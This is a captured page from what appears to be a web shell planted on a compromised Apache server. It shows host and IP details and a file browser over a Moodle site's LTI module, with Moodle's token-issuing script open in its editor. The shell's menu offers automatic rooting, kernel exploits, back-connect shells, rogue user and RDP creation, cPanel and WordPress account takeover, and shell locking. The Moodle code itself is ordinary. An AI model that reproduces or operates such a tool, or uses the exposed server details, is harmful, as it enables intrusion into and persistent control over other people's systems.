Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
lti /
[ HOME SHELL ]
Name
Size
Permission
Action
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
OAuth.php
29.4
KB
-rw-r--r--
OAuthBody.php
5.41
KB
-rw-r--r--
TrivialStore.php
4.87
KB
-rw-r--r--
ajax.php
3.18
KB
-rw-r--r--
auth.php
5.9
KB
-rw-r--r--
certs.php
1.16
KB
-rw-r--r--
contentitem.php
2.43
KB
-rw-r--r--
contentitem_return.php
3.75
KB
-rw-r--r--
edit_form.php
18.63
KB
-rw-r--r--
externalregistrationreturn.php
2.31
KB
-rw-r--r--
index.php
4.46
KB
-rw-r--r--
instructor_edit_tool_type.php
3.89
KB
-rw-r--r--
launch.php
3.53
KB
-rw-r--r--
lib.php
26.92
KB
-rw-rw-r--
locallib.php
154.06
KB
-rw-rw-r--
mod_form.js
23.42
KB
-rw-r--r--
mod_form.php
18.59
KB
-rw-r--r--
openid-configuration.php
2.66
KB
-rw-r--r--
openid-registration.php
3.46
KB
-rw-r--r--
register.php
4.39
KB
-rw-r--r--
register_form.php
4.33
KB
-rw-r--r--
registersettings.php
3.09
KB
-rw-rw-r--
registration.php
1.4
KB
-rw-r--r--
registrationreturn.php
3.47
KB
-rw-r--r--
request_tool.php
2.57
KB
-rw-r--r--
return.php
4.71
KB
-rw-r--r--
service.php
7.48
KB
-rw-r--r--
servicelib.php
9.89
KB
-rw-r--r--
services.php
3.01
KB
-rw-r--r--
settings.php
8.03
KB
-rw-r--r--
startltiadvregistration.php
2.95
KB
-rw-r--r--
styles.css
7.9
KB
-rw-r--r--
token.php
3.42
KB
-rw-r--r--
toolconfigure.php
2.09
KB
-rw-r--r--
toolproxies.php
6.4
KB
-rw-r--r--
toolssettings.php
3.83
KB
-rw-r--r--
typessettings.php
5.61
KB
-rw-rw-r--
upgrade.txt
3.69
KB
-rw-r--r--
upgradelib.php
2.08
KB
-rw-r--r--
version.php
2.58
KB
-rw-rw-r--
view.php
8.56
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : token.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * This file contains a service for issuing access tokens * * @package mod_lti * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define('NO_DEBUG_DISPLAY', true); define('NO_MOODLE_COOKIES', true); use Firebase\JWT\JWT; require_once(__DIR__ . '/../../config.php'); require_once($CFG->dirroot . '/mod/lti/locallib.php'); $response = new \mod_lti\local\ltiservice\response(); $contenttype = isset($_SERVER['CONTENT_TYPE']) ? explode(';', $_SERVER['CONTENT_TYPE'], 2)[0] : ''; $ok = ($_SERVER['REQUEST_METHOD'] === 'POST') && ($contenttype === 'application/x-www-form-urlencoded'); $error = 'invalid_request'; $clientassertion = optional_param('client_assertion', '', PARAM_TEXT); $clientassertiontype = optional_param('client_assertion_type', '', PARAM_TEXT); $granttype = optional_param('grant_type', '', PARAM_TEXT); $scope = optional_param('scope', '', PARAM_TEXT); if ($ok) { $ok = !empty($clientassertion) && !empty($clientassertiontype) && !empty($granttype) && !empty($scope); } if ($ok) { $ok = ($clientassertiontype === 'urn:ietf:params:oauth:client-assertion-type:jwt-bearer') && ($granttype === 'client_credentials'); $error = 'unsupported_grant_type'; } if ($ok) { $parts = explode('.', $clientassertion); $ok = (count($parts) === 3); if ($ok) { $payload = JWT::urlsafeB64Decode($parts[1]); $claims = json_decode($payload, true); $ok = !is_null($claims) && !empty($claims['sub']); } $error = 'invalid_request'; } if ($ok) { $tool = $DB->get_record('lti_types', array('clientid' => $claims['sub'])); if ($tool) { try { lti_verify_jwt_signature($tool->id, $claims['sub'], $clientassertion); $ok = true; } catch (Exception $e) { $error = $e->getMessage(); $ok = false; } } else { $error = 'invalid_client'; $ok = false; } } if ($ok) { $scopes = array(); $requestedscopes = explode(' ', $scope); $typeconfig = lti_get_type_config($tool->id); $permittedscopes = lti_get_permitted_service_scopes($tool, $typeconfig); $scopes = array_intersect($requestedscopes, $permittedscopes); $ok = !empty($scopes); $error = 'invalid_scope'; } if ($ok) { $token = lti_new_access_token($tool->id, $scopes); $expiry = LTI_ACCESS_TOKEN_LIFE; $permittedscopes = implode(' ', $scopes); $body = <<< EOD { "access_token" : "{$token->token}", "token_type" : "Bearer", "expires_in" : {$expiry}, "scope" : "{$permittedscopes}" } EOD; } else { $response->set_code(400); $body = <<< EOD { "error" : "{$error}" } EOD; } $response->set_body($body); $response->send();
Close